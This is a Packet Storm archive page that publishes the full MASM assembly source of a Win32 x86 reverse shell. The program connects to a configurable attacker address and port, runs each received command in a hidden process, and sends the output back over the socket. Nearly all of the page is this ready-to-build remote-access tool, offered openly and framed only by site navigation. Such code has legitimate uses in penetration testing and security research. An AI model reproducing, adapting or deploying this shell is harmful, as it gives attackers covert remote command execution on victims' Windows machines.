exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Win32 x86 Reverse Shell In Assembly

Win32 x86 Reverse Shell In Assembly
Posted Mar 7, 2016
Authored by Andrea Sindoni

This is a simple reverse shell written in assembly for remote command execution on win32.

tags | remote, shell, shellcode
systems | windows
SHA-256 | 896d5235c9827973cc96df4bfde3554d14494a09f77c947ad44f5ed8f639a7a6
Download | Favorite | View

Win32 x86 Reverse Shell In Assembly

Change Mirror Download
.586
.model flat,stdcall
option casemap:none
 
include /masm32/include/windows.inc
include /masm32/include/masm32.inc
include /masm32/include/gdi32.inc
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
include /masm32/include/wsock32.inc

includelib /masm32/lib/masm32.lib
includelib /masm32/lib/gdi32.lib
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
includelib /masm32/lib/masm32.lib
includelib /masm32/lib/wsock32.lib

.const
MEMSIZE equ 65535

.data
AppName     db "Reverse Shell | Andrea Sindoni @invictus1306",0

err0        db "An error occured while calling WSAStartup",0
err1        db "An error occured while creating a socket",0
err2        db "An error occured while connecting",0
err3        db "An error occured while calling gethostbyname",0
err4        db "An error occured while calling connect/recv",0
err5        db "An error occured while calling CreatePipe",0
err6        db "An error occured while calling GlobalAlloc/Free-GlobalLock/Unlock",0
err7        db "An error occured while calling CreateProcess",0
capt        db "Information",0
hostname    db "192.168.1.86",0 ; change it with your address
port        dd 4444 ; change port number

recbuf byte 1001 dup (0)
 
.data?

sock            dd ?
ErrorCode       dd ?
pipe_read       dd ?
pipe_write      dd ?
size_to_send    dd ?
bwr             dd ?
stored_buffer   dd ?
wsadata WSADATA <>
sin sockaddr_in <?>
security_attrib SECURITY_ATTRIBUTES <>
stinfo STARTUPINFO <>
pinfo PROCESS_INFORMATION <>
buffer db 1024 dup(?)
hMemory HANDLE ?

 
.code

show_error proc caption:ptr byte, err_txt:ptr byte
    invoke WSAGetLastError
    mov ErrorCode, eax
    invoke MessageBoxA, MB_OK, err_txt, caption, 0
    ret
show_error endp

show_error_1 proc caption:ptr byte, err_txt:ptr byte
    invoke GetLastError
    mov ErrorCode, eax
    invoke MessageBoxA, MB_OK, err_txt, caption, 0
    ret
show_error_1 endp

main proc

    invoke WSAStartup, 101h, addr wsadata
    cmp eax, 0
    jnz @error_wsa_startup
    invoke socket ,AF_INET, SOCK_STREAM, 0 ; Create a stream socket
    cmp eax, INVALID_SOCKET
    je @error_socket_creation
    mov sock, eax
    mov sin.sin_family, AF_INET
    invoke htons, port 
    mov sin.sin_port, ax
    invoke gethostbyname, addr hostname
    cmp eax, 0
    je @error_gethostbyname
    mov eax, [eax+12]   
    mov eax, [eax]      
    mov eax, [eax] ; copy ip address
    mov sin.sin_addr,eax
    invoke connect, sock, addr sin, sizeof sin
    cmp eax, SOCKET_ERROR
    je @error_socket_error

    @@receive_data_loop:
    invoke RtlZeroMemory, ADDR recbuf, sizeof recbuf
    invoke recv, sock, addr recbuf, 1000, NULL
    cmp eax, SOCKET_ERROR
    je @error_socket_error
   
    mov security_attrib.lpSecurityDescriptor,0
    mov security_attrib.bInheritHandle, TRUE
    mov security_attrib.nLength, sizeof SECURITY_ATTRIBUTES

    invoke CreatePipe, offset pipe_read, offset pipe_write, offset security_attrib, 0
    cmp eax, 0
    jz @error_creation_pipe
   
    mov stinfo.cb,sizeof STARTUPINFO
    mov eax, pipe_write
    mov stinfo.hStdOutput, eax
    mov stinfo.hStdError, eax
    mov stinfo.dwFlags, STARTF_USESHOWWINDOW+ STARTF_USESTDHANDLES
    mov stinfo.wShowWindow, SW_HIDE
   
    invoke CreateProcess, 0, ADDR recbuf, 0, 0, TRUE, 0, 0, 0, offset stinfo, offset pinfo
    or eax,eax
    invoke CloseHandle, pipe_write
    jz @error_create_process
   
    invoke RtlZeroMemory, ADDR buffer, sizeof buffer
   
    invoke GlobalAlloc, GMEM_MOVEABLE or GMEM_ZEROINIT, MEMSIZE
    cmp eax, 0
    je @error_global_alloc
   
    mov hMemory, eax
    invoke GlobalLock, hMemory
    cmp eax, 0
    je @error_global_lock
   
    ;mov stored_buffer, dword ptr [eax]
    mov stored_buffer, eax
    mov edi, [stored_buffer]
    xor ecx, ecx
    mov size_to_send, 0
   
    loop_:
        invoke ReadFile, pipe_read, offset buffer, 1024, offset bwr, 0
        add size_to_send, 1
        cmp eax, 0
        jz _found
       
        invoke lstrcat, edi, addr buffer ; append current buffer content to edi
        invoke RtlZeroMemory, addr buffer, sizeof buffer
    jmp loop_
       
    _found:
    xor eax, eax
    xor ecx, ecx
    mov ecx, 1024
    mov al, byte ptr [size_to_send]
    mul ecx ; I take a size that is multiple of 1024
    mov size_to_send, eax

    invoke send, sock, edi, size_to_send, 0
    cmp eax, SOCKET_ERROR
    je @error_connection
   
    invoke GlobalUnlock, hMemory
    cmp eax, 0
    jnz @error_global_lock
    invoke GlobalFree, hMemory
    cmp eax, 0
    jnz @error_global_alloc   
   
    ;invoke Sleep, 1000

    jmp @@receive_data_loop
   
    exit:
    invoke closesocket, sock
    cmp eax, INVALID_SOCKET
    je @error_socket_creation
    invoke WSACleanup
    invoke ExitProcess,0
   
    @error_wsa_startup:
    invoke show_error, offset capt, offset err0
    jmp exit
   
    @error_socket_creation:
    invoke show_error, offset capt, offset err1
    jmp exit
   
    @error_connection:
    invoke show_error, offset capt, offset err2
    jmp exit

    @error_gethostbyname:
    invoke show_error, offset capt, offset err3
    jmp exit
   
    @error_socket_error:
    invoke show_error, offset capt, offset err4
    jmp exit
   
    @error_creation_pipe:
    invoke show_error, offset capt, offset err5
    jmp exit
   
    @error_create_process:
    invoke show_error_1, offset capt, offset err7
    jmp exit
   
    @error_global_alloc:
    invoke show_error_1, offset capt, offset err6
    jmp exit
   
    @error_global_lock:
    invoke show_error_1, offset capt, offset err6
    jmp exit

main endp

end main

end start
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close